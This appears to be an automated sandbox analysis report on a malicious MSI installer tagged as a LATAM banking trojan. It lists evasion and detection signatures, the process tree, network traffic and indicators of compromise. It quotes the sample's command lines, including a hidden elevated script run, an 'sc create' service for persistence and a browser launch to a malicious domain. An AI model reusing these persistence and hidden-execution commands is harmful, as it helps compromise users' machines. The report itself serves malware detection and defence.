Windows Analysis Report
CrzA2u67LQ.msi

Overview

General Information

Sample name: CrzA2u67LQ.msi (renamed because original name is a hash value)
Original sample name: a477e01f4afeaee40323a6981773ab20f7405c013f6a0398c9126e73d057616a.msi
Analysis ID: 1450377
MD5: 41eed8b68bb6ddf7bdd73d285109e460
SHA1: 6a83946536e41d65d8f52f8222a3235c9877fcf3
SHA256: a477e01f4afeaee40323a6981773ab20f7405c013f6a0398c9126e73d057616a
Tags: banker, latam, msi, trojan

Detection

Score: 40
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Overwrites code with unconditional jumps - possibly setting hooks in a foreign process
PE file contains section with special chars
AV process strings found (often used to terminate AV products)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries keyboard layouts
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Always Install Elevated MSI Spawned Cmd And Powershell
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • msiexec.exe (PID: 6652 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\CrzA2u67LQ.msi" MD5: E5DA170027542E25EDE42FC54C929077)
  • msiexec.exe (PID: 4348 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 2144 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding D52069831D98616EE51C5339C351C5F6 MD5: 9D09DC1EDA745A5F87553048E57620CF)
    • MSI5DCF.tmp (PID: 6528 cmdline: "C:\Windows\Installer\MSI5DCF.tmp" /DontWait /RunAsAdmin /HideWindow "C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\ MD5: 768B35409005592DE2333371C6253BC8)
      • cmd.exe (PID: 7228 cmdline: "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • sc.exe (PID: 7336 cmdline: sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
        • sc.exe (PID: 7360 cmdline: sc start MeuServico MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
    • MSI5DEF.tmp (PID: 1868 cmdline: "C:\Windows\Installer\MSI5DEF.tmp" /DontWait /HideWindow "C:\Users\user\Pictures\fotosdaviagem\cont.cmd" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\ MD5: 768B35409005592DE2333371C6253BC8)
    • windows10.exe (PID: 6388 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
      • windows10.exe (PID: 7216 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" /systemstartup MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
      • windows10.exe (PID: 7192 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" -type:exit-monitor-method:collectupload-session-token MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
      • windows10.exe (PID: 6800 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=utility--utility-sub-type=network.mojom. MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
      • windows10.exe (PID: 6600 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=gpu-process--field-trial-handle=4305.474 MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
      • windows10.exe (PID: 6748 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=renderer--field-trial-handle=4304.754958 MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
        • windows10.exe (PID: 2492 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" neto2 MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
  • cmd.exe (PID: 7220 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Pictures\fotosdaviagem\cont.cmd" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • chrome.exe (PID: 7388 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://winrarbrasil.from-mn.com/clientes/inspecionando.php MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 7652 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 --field-trial-handle=2224,i,6715851174139391298,17441490298513551426,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • windows10.exe (PID: 7376 cmdline: C:\Users\user\Pictures\fotosdaviagem\windows10.exe MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
    • windows10.exe (PID: 6432 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" /systemstartup MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
    • windows10.exe (PID: 2120 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" -type:exit-monitor-method:collectupload-session-token MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
    • windows10.exe (PID: 7260 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=utility--utility-sub-type=network.mojom. MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
    • windows10.exe (PID: 6680 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=gpu-process--field-trial-handle=4305.474 MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
    • windows10.exe (PID: 6728 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" --type=renderer--field-trial-handle=4304.754958 MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
      • windows10.exe (PID: 2588 cmdline: "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" neto2 MD5: BDC0CFF1E6E3DB489864041A623F0D1E)
  • svchost.exe (PID: 7532 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
0000001A.00000002.4175519677.0000000000951000.00000020.00000001.01000000.00000007.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
00000018.00000002.4174825409.00000000009A1000.00000020.00000001.01000000.00000007.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
00000013.00000002.4175193752.0000000000981000.00000020.00000001.01000000.00000007.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
00000014.00000002.4175517301.0000000000911000.00000020.00000001.01000000.00000007.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security
00000011.00000002.4174824901.00000000008F1000.00000020.00000001.01000000.00000007.sdmp | JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security

            System Summary

Source: Process started | Author: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community | Data: Command: "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\", CommandLine: "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\Installer\MSI5DCF.tmp" /DontWait /RunAsAdmin /HideWindow "C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\, ParentImage: C:\Windows\Installer\MSI5DCF.tmp, ParentProcessId: 6528, ParentProcessName: MSI5DCF.tmp, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\", ProcessId: 7228, ProcessName: cmd.exe
Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto, CommandLine: sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C ""C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7228, ParentProcessName: cmd.exe, ProcessCommandLine: sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto, ProcessId: 7336, ProcessName: sc.exe
Source: Process started | Author: vburov | Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7532, ProcessName: svchost.exe
            No Snort rule has matched

            AV Detection

Source: http://www.audio-tool.net | Virustotal: Detection: 5%
Source: C:\Users\user\Pictures\fotosdaviagem\StarBurn.dll | ReversingLabs: Detection: 48%
Source: C:\Users\user\Pictures\fotosdaviagem\StarBurn.dll | Virustotal: Detection: 33%
Source: CrzA2u67LQ.msi | Virustotal: Detection: 26%
Source: CrzA2u67LQ.msi | ReversingLabs: Detection: 31%
Source: C:\Users\user\Pictures\fotosdaviagem\StarBurn.dll | Joe Sandbox ML: detected
Source: unknown | HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbC | source: MSI5DCF.tmp, 00000003.00000000.1726216258.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp, MSI5DCF.tmp, 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp, MSI5DEF.tmp, 00000004.00000000.1726938190.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp, MSI5DEF.tmp, 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp, CrzA2u67LQ.msi, MSI5DEF.tmp.1.dr, MSI5DCF.tmp.1.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb | source: CrzA2u67LQ.msi, MSI55AB.tmp.1.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb | source: MSI5DCF.tmp, 00000003.00000000.1726216258.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp, MSI5DCF.tmp, 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmp, MSI5DEF.tmp, 00000004.00000000.1726938190.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp, MSI5DEF.tmp, 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp, CrzA2u67LQ.msi, MSI5DEF.tmp.1.dr, MSI5DCF.tmp.1.dr
Source: C:\Windows\System32\msiexec.exe | File opened: z:
Source: C:\Windows\System32\msiexec.exe | File opened: x:
Source: C:\Windows\System32\msiexec.exe | File opened: v:
Source: C:\Windows\System32\msiexec.exe | File opened: t:
Source: C:\Windows\System32\msiexec.exe | File opened: r:
Source: C:\Windows\System32\msiexec.exe | File opened: p:
Source: C:\Windows\System32\msiexec.exe | File opened: n:
Source: C:\Windows\System32\msiexec.exe | File opened: l:
Source: C:\Windows\System32\msiexec.exe | File opened: j:
Source: C:\Windows\System32\msiexec.exe | File opened: h:
Source: C:\Windows\System32\msiexec.exe | File opened: f:
Source: C:\Windows\System32\msiexec.exe | File opened: b:
Source: C:\Windows\System32\msiexec.exe | File opened: y:
Source: C:\Windows\System32\msiexec.exe | File opened: w:
Source: C:\Windows\System32\msiexec.exe | File opened: u:
Source: C:\Windows\System32\msiexec.exe | File opened: s:
Source: C:\Windows\System32\msiexec.exe | File opened: q:
Source: C:\Windows\System32\msiexec.exe | File opened: o:
Source: C:\Windows\System32\msiexec.exe | File opened: m:
Source: C:\Windows\System32\msiexec.exe | File opened: k:
Source: C:\Windows\System32\msiexec.exe | File opened: i:
Source: C:\Windows\System32\msiexec.exe | File opened: g:
Source: C:\Windows\System32\msiexec.exe | File opened: e:
Source: C:\Windows\System32\svchost.exe | File opened: c:
Source: C:\Windows\System32\msiexec.exe | File opened: a:
Source: C:\Windows\Installer\MSI5DCF.tmp | Code function: 3_2_00B1069D FindFirstFileExW,FindNextFileW,FindClose,FindClose | 3_2_00B1069D
Source: C:\Windows\Installer\MSI5DEF.tmp | Code function: 4_2_00B2069D FindFirstFileExW,FindNextFileW,FindClose,FindClose | 4_2_00B2069D
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Code function: 16_2_0097D08C FindFirstFileW | 16_2_0097D08C
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Code function: 17_2_008FD08C FindFirstFileW | 17_2_008FD08C
Source: Joe Sandbox View | IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View | JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown | TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown | TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown | TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown | TCP traffic detected without corresponding DNS query: 93.184.221.240
Source: unknown | TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown | TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown | TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown | TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown | TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown | TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown | TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown | TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown | TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown | TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown | TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown | TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown | TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown | TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown | TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown | TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown | TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown | TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown | TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown | TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown | TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown | TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown | TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown | TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown | TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown | TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown | TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown | TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown | TCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected:
    GET /clientes/inspecionando.php HTTP/1.1
    Host: winrarbrasil.from-mn.com
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /favicon.ico HTTP/1.1
    Host: winrarbrasil.from-mn.com
    Connection: keep-alive
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    sec-ch-ua-platform: "Windows"
    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: no-cors
    Sec-Fetch-Dest: image
    Referer: https://winrarbrasil.from-mn.com/clientes/inspecionando.php
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /clientes/inspecionando.php HTTP/1.1
    Host: winrarbrasil.from-mn.com
    Connection: keep-alive
    Cache-Control: max-age=0
    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Dest: document
    Referer: https://winrarbrasil.from-mn.com/clientes/inspecionando.php
    Accept-Encoding: gzip, deflate, br
    Accept-Language: en-US,en;q=0.9
Source: global traffic | HTTP traffic detected:
    GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=l4wC5+uAGMYoEDn&MD=LxwYCEF6 HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
    Host: slscr.update.microsoft.com
Source: global traffic | HTTP traffic detected:
    GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=l4wC5+uAGMYoEDn&MD=LxwYCEF6 HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
    Host: slscr.update.microsoft.com
Source: global traffic | DNS traffic detected: DNS query: winrarbrasil.from-mn.com
Source: global traffic | DNS traffic detected: DNS query: www.google.com
Source: global traffic | HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Sat, 01 Jun 2024 17:04:47 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Content-Length: 287
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
Source: svchost.exe, 0000000E.00000002.4162711913.000001D048000000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
Source: svchost.exe, 0000000E.00000003.1778037537.000001D047EC8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 0000000E.00000003.1778037537.000001D047EC8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: svchost.exe, 0000000E.00000003.1778037537.000001D047EC8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: svchost.exe, 0000000E.00000003.1778037537.000001D047EC8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 0000000E.00000003.1778037537.000001D047EC8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 0000000E.00000003.1778037537.000001D047EC8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 0000000E.00000002.4163305845.000001D048061000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.2398619432.000001D047EB2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.4157781889.000001D043302000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/advpwg3mz7ss7gbgrn55w455vr5q_2024.5.21.0/
Source: svchost.exe, 0000000E.00000003.1778037537.000001D047EFD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: svchost.exe, 0000000E.00000002.4163305845.000001D048061000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.4163305845.000001D048090000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://edgedl.me.gvt1.com:80
Source: svchost.exe, 0000000E.00000003.1778037537.000001D047FB7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2147178855.000000007F8AE000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/json/
Source: windows10.exe, 00000005.00000000.1727345911.0000000000497000.00000002.00000001.01000000.00000005.sdmp | String found in binary or memory: http://www.audio-tool.net
Source: windows10.exe, 0000001D.00000002.4303445790.0000000002A50000.00000040.00001000.00020000.00000000.sdmp, windows10.exe, 0000001D.00000003.2147178855.000000007F8AE000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.indyproject.org/
Source: svchost.exe, 0000000E.00000003.1778037537.000001D047F72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: svchost.exe, 0000000E.00000003.1778037537.000001D047FAF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: svchost.exe, 0000000E.00000003.1778037537.000001D047F72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: svchost.exe, 0000000E.00000003.1778037537.000001D047F53000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1778037537.000001D047FB7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 0000000E.00000003.1778037537.000001D047F72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: svchost.exe, 0000000E.00000003.1778037537.000001D047F72000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: svchost.exe, 0000000E.00000003.1778037537.000001D047F06000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: unknown | Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown | Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown | Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown | HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49753 version: TLS 1.2

            System Summary

Source: StarBurn.dll.1.dr | Static PE information: section name: .?#3
Source: StarBurn.dll.1.dr | Static PE information: section name: .F~x
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory allocated: 777B0000 page read and write
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory allocated: 77160000 page read and write
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory allocated: 72430000 page read and write
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory allocated: 71910000 page read and write
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory allocated: 712C0000 page read and write
Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Memory allocated: 707A0000 page read and write
